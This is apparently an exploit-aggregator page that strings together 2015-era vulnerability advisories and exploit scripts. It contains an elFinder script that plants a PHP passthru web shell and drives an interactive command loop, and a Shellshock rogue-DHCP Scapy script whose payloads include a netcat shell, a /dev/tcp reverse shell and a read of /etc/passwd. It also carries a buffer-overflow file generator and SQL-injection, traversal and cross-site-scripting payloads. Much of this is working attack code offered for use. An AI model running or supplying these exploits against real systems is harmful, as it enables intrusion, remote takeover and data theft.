HireHackking

Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1480 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. (Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AppzCreative Ltd Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:52437/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software to your iOS device 2. Start the mobile ios software and activate the web-server 3. Open the wifi interface for file transfers 4. Start a session tamper and upload a random fil 5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) 6. Save the input by processing to continue the request 7. The code executes in the main file dir index list of the local web-server (localhost:52437) 8. Open the link with the private folder and attach the file for successful exploitation with the path value 9. Successful reproduce of the vulnerability! PoC: Upload File (http://localhost:52437/Box/) <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div> --- PoC Session Logs [POST] (LFI - Filename) --- Status: 200[OK] POST http://localhost:52437/Box/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:52437] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:52437/Box/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------321711425710317 Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" Content-Type: image/png Reference(s): http://localhost:52437/ http://localhost:52437/Box/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. Security Risk: ============== The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Document Title: =============== vPhoto-Album v4.2 iOS - File Include Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1477 Release Date: ============= 2015-05-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1477 Common Vulnerability Scoring System: ==================================== 6.2 Product & Service Introduction: =============================== vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, while giving you an unprecedented user experience. No in-app purchase, no functional limitations. (Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cheng Chen Product: vPhoto-Album - iOS Web Application (Wifi) 4.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname. Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync. The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application. The request method to inject is a sync and the attack vector is located on the application-side of the affected service. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1. Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. Vulnerable Method(s): [+] [Sync] Vulnerable Module(s): [+] Albumname Vulnerable Parameter(s): [+] name Affected Module(s): [+] File Dir Index Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: http://localhost:8080/ <script type="text/javascript"> var albumArray = getAllAlbum(); var numberOfAlbums = getNumberOfAlbums(); for (var i=0; i<numberOfAlbums; i=i+4) { document.write("<tr>"); document.write("<td height=\"170\" width=\"150\">"); if (i+0 < numberOfAlbums) { document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>"); } document.write("</td>"); document.write("<td height=\"170\" width=\"50\"></td>"); document.write("<td height=\"170\" width=\"150\">"); if (i+1 < numberOfAlbums) { document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>"); } document.write("</td>"); document.write("<td height=\"170\" width=\"50\"></td>"); document.write("<td height=\"170\" width=\"150\">"); if (i+2 < numberOfAlbums) { document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>"); } document.write("</td>"); document.write("<td height=\"170\" width=\"50\"></td>"); document.write("<td height=\"170\" width=\"150\">"); if (i+3 < numberOfAlbums) { document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>"); } document.write("</td>"); document.write("</tr>"); document.write("<tr>"); document.write("<td height=\"20\" > <p align=\"center\">"); if (i+0 < numberOfAlbums) { document.write("<font face=\"Courier New\" size=\"2\">"); document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")"); document.write("</font>"); } document.write("</td>"); document.write("<td height=\"20\" width=\"50\"></td>"); document.write("<td height=\"20\" > <p align=\"center\">"); if (i+1 < numberOfAlbums) { document.write("<font face=\"Courier New\" size=\"2\">"); document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")"); document.write("</font>"); } document.write("</td>"); document.write("<td height=\"20\" width=\"50\"></td>"); document.write("<td height=\"20\" > <p align=\"center\">"); if (i+2 < numberOfAlbums) { document.write("<font face=\"Courier New\" size=\"2\">"); document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")"); document.write("</font>"); } document.write("</td>"); document.write("<td height=\"20\" width=\"50\"></td>"); document.write("<td height=\"20\" > <p align=\"center\">"); if (i+3 < numberOfAlbums) { document.write("<font face=\"Courier New\" size=\"2\">"); document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")"); document.write("</font>"); } document.write("</td>"); document.write("</tr>"); document.write("<tr>"); document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>"); document.write("</tr>"); } </script> <tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr> </table> </div> </body> </html></iframe></font></p></td></tr></tbody> Reference(s): http://localhost:8080/ Security Risk: ============== The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

#[+] Author: TUNISIAN CYBER #[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability #[+] Date: 06-05-2015 #[+] Vendor: https://github.com/Studio-42/elFinder #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] Twitter: @TCYB3R #[+] Time Line: # 03-05-2015:Vulnerability Discovered # 03-05-2015:Contacted Vendor # 04-05-2015:No response # 05-05-2015:No response # 06-05-2015:No response # 06-05-2015:Vulnerability published import cookielib, urllib import urllib2 import sys print"\x20\x20+-------------------------------------------------+" print"\x20\x20| elFinder Remote Command Execution Vulnerability |" print"\x20\x20| TUNISIAN CYBER |" print"\x20\x20+-------------------------------------------------+" host = raw_input('\x20\x20Vulnerable Site:') evilfile = raw_input('\x20\x20EvilFileName:') path=raw_input('\x20\x20elFinder s Path:') tcyber = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber)) create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw') #print create.read() payload = urllib.urlencode({ 'cmd' : 'put', 'target' : 'l1_'+evilfile.encode('base64','strict'), 'content' : '<?php passthru($_GET[\'cmd\']); ?>' }) write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload) #print write.read() print '\n' while True: try: cmd = raw_input('[She3LL]:~# ') execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd)) reverse = execute.read() print reverse; if cmd.strip() == 'exit': break except Exception: break sys.exit()

source: https://www.securityfocus.com/bid/52347/info LeKommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/path/secc.php?id={sqli}

source: https://www.securityfocus.com/bid/52350/info ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks. The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ToendaCMS 1.6.2 is vulnerable; other versions may also be affected. http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s

source: https://www.securityfocus.com/bid/52356/info Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected. HTML injection: <tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed"> <tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1"> <tbody><tr> <tdclass="Container_Header"> <table> <tbody><tr> <tdclass="Container_Header_First"> <tdclass="Container_Header_Center"> Administratorsonline </td><tdclass="Container_Header_Last"> </td> </tr> </tbody></table></td> </tr> <tr> <tdclass="Container_Body"> <divclass="BorderFix_FFForm_Ctrl_Label"> <br/> 1Users<br/> JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody> </table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html> Cross-site scripting: http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script> or base64 encoded: http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= () BASE64@PHNjcmlwdD5hb GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4= Non-persistent(listViewName): <tdcolspan="6"class="Frame_Body_Center"> <tablewidth="100%"border="0"class="Maxed"> <tbody><trvalign="top"> <tdstyle="padding:10px;"id="Conainer_1"> <tablewidth=""cellspacing="0"cellpadding="0"border="0"> <tbody><tr> <td> <tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1"> <tbody><tr> <tdclass="Container_Header"> <table> <tbody><tr> <tdclass="Container_Header_First"/> <tdclass="Container_Header_Center"> <palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE> </p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr> </tbody></table></td></tr></tbody></table></form></body></html>

source: https://www.securityfocus.com/bid/52351/info Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition. Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected. #!/usr/bin/python # Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow # Version: 7.5.0 # Date: 2012-03-04 # Author: Julien Ahrens # Homepage: http://www.inshell.net # Software Link: http://www.macrotoolworks.com # Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German # Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way. # Howto: Copy options.ini to App-Dir --> Launch # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 3128) # Registers: # EAX 0120EA00 Stack[000004C8]:0120EA00 # EBX FFFFFFFF # ECX 42424242 # EDX 00000002 # ESI 007F6348 _prog.exe:007F6348 # EDI 007F6348 _prog.exe:007F6348 # EBP 0120EA0C Stack[000004C8]:0120EA0C # ESP 0120E9E8 Stack[000004C8]:0120E9E8 # EIP 00646D36 _prog.exe:00646D36 # EFL 00200206 # Stack: # 0120E9E0 0012DF3C # 0120E9E4 00000000 # 0120E9E8 0205A5A0 debug045:0205A5A0 # 0120E9EC 1B879EF8 # 0120E9F0 007F6348 _prog.exe:007F6348 # 0120E9F4 007F6348 _prog.exe:007F6348 # Crash: # _prog.exe:00646D36 ; --------------------------------------------------------------------------- # _prog.exe:00646D36 mov eax, [ecx] # _prog.exe:00646D38 call dword ptr [eax+0Ch] # _prog.exe:00646D3B call near ptr unk_6750D0 # _prog.exe:00646D40 retn 4 # _prog.exe:00646D40 ; --------------------------------------------------------------------------- # Dump: # 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA # 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA # 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC # 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC # 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC file="options.ini" junk1="\x41" * 744 boom="\x42\x42\x42\x42" junk2="\x43" * 100 poc="[last]\n" poc=poc + "file=" + junk1 + boom + junk2 try: print "[*] Creating exploit file...\n" writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!" except: print "[!] Error while creating file!"

source: https://www.securityfocus.com/bid/52358/info Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected. <td class="detailTD"> <div style="float: left;" class="printedName"> "><iframe div="" <="" onload='alert("VL")' src="a"> </td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144', {"flag_super":"0","flag_locked": "0","bbx_extension_rcd":"2012-02-16 11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name": "\"><iframe src=a onload=alert(\"vl\") <","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_ map_fallback_exten":null,"bbx_ extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_ row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE] <","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_ forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id": {"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value" :"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE] <","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>

# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result = $_POST; [...] Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id="1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6

#!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "10.0.1.100" server_ip = "10.0.1.2" gateway_ip = "10.0.1.2" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "00:50:56:c0:00:01" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" rce = payload_5 def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1") if __name__ == '__main__': sys.exit(main())

